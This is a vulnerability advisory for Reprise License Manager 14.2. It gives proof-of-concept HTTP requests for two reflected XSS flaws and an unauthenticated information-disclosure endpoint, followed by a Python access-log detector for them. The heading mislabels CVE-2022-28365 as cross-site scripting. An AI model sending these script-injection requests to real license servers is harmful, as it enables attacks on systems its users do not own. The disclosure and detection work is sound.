CVE-2022-28365: Reprise License Manager 14.2 Cross Site Scripting
Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture, and file/directory details.
Multiple Vulnerabilities in Reprise License Manager 14.2
Credit: Giulia Melotti Garibaldi

//////////////////////////////////////////////////////////////

# Product: RLM 14.2
# Vendor: Reprise Software
# CVE ID: CVE-2022-28363
# Vulnerability Title: Reflected Cross-Site Scripting
# Severity: Medium
# Author(s): Giulia Melotti Garibaldi
# Date: 2022-03-29
#
#############################################################

Introduction:
Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required.

Vulnerability PoC:
GET http://HOST:5054/goform/login_process?username=admin<script>alert("1")</script><script>alert("1")</script>&password=admin&ok=LOGIN HTTP/1.1
Host: HOST:5054
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://HOST:5054
Connection: keep-alive
Referer: http://HOST:5054/goform/login_process

//////////////////////////////////////////////////////////////

# Product: RLM 14.2
# Vendor: Reprise Software
# CVE ID: CVE-2022-28364
# Vulnerability Title: Authenticated Reflected Cross-Site Scripting
# Severity: Low
# Author(s): Giulia Melotti Garibaldi
# Date: 2022-03-29
#
#############################################################

Introduction:
Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/rlmswitchr_process "file" parameter via GET. Authentication is required.

Vulnerability PoC:
GET http://HOST:5054/goform/rlmswitchr_process?file=<script>alert("1")</script> HTTP/1.1
Host: HOST:5054
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Origin: http://HOST:5054
Connection: keep-alive
Referer: http://HOST:5054/goforms/rlmswitchr
Cookie: REDACTED

//////////////////////////////////////////////////////////////

# Product: RLM 14.2
# Vendor: Reprise Software
# CVE ID: CVE-2022-28365
# Vulnerability Title: Unauthenticated Information Disclosure
# Severity: Low
# Author(s): Giulia Melotti Garibaldi
# Date: 2022-03-29
#
#############################################################

Introduction:
Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required.
The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.

Vulnerability PoC:
GET http://HOST:5054/goforms/rlminfo HTTP/1.1
Host: HOST:5054
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Content-Length: 0

//////////////////////////////////////////////////////////////
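
Detection example (added here, not part of the original advisory or of Reprise's code): a log check that flags requests matching the three entries above. It assumes the RLM web interface sits behind a reverse proxy writing common/combined-format access logs; the log format, the sample lines and the names classify and SAMPLE_LOG are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint -> (parameter, CVE) pairs taken from the advisory's two XSS entries.
XSS_PARAMS = {
    "/goform/login_process": ("username", "CVE-2022-28363"),
    "/goform/rlmswitchr_process": ("file", "CVE-2022-28364"),
}
INFO_PATH, INFO_CVE = "/goforms/rlminfo", "CVE-2022-28365"

# Assumption: the request line is logged as "METHOD target HTTP/x.y".
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
ANGLE = re.compile(r"[<>]")

# Constructed sample log lines (documentation IP addresses, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Mar/2022:10:00:01 +0000] "GET /goforms/rlminfo HTTP/1.1" 200 5120',
    '192.0.2.10 - - [29/Mar/2022:10:00:05 +0000] "GET /goform/login_process?username=admin%3Cscript%3Ealert(%221%22)%3C/script%3E&password=admin&ok=LOGIN HTTP/1.1" 200 812',
    '192.0.2.11 - - [29/Mar/2022:10:01:00 +0000] "GET /goform/login_process?username=alice&password=x&ok=LOGIN HTTP/1.1" 200 640',
    '192.0.2.12 - - [29/Mar/2022:10:02:00 +0000] "GET /goform/rlmswitchr_process?file=%3Cscript%3Ealert(%221%22)%3C/script%3E HTTP/1.1" 200 700',
]

def classify(line):
    """Return a list of (cve, reason) findings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))  # also handles absolute-form targets
    path = url.path.rstrip("/")
    findings = []
    if path == INFO_PATH:
        findings.append((INFO_CVE, "rlminfo page requested"))
    if path in XSS_PARAMS:
        param, cve = XSS_PARAMS[path]
        # parse_qs percent-decodes once, so %3Cscript%3E is seen as <script>
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if ANGLE.search(value):
                findings.append((cve, f"angle brackets in '{param}'"))
    return findings

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for cve, reason in classify(line):
            print(cve, reason, line.split()[0])
```

Because the rlminfo page needs no authentication, any hit on it from outside the administrative network is worth reviewing even when no XSS finding accompanies it.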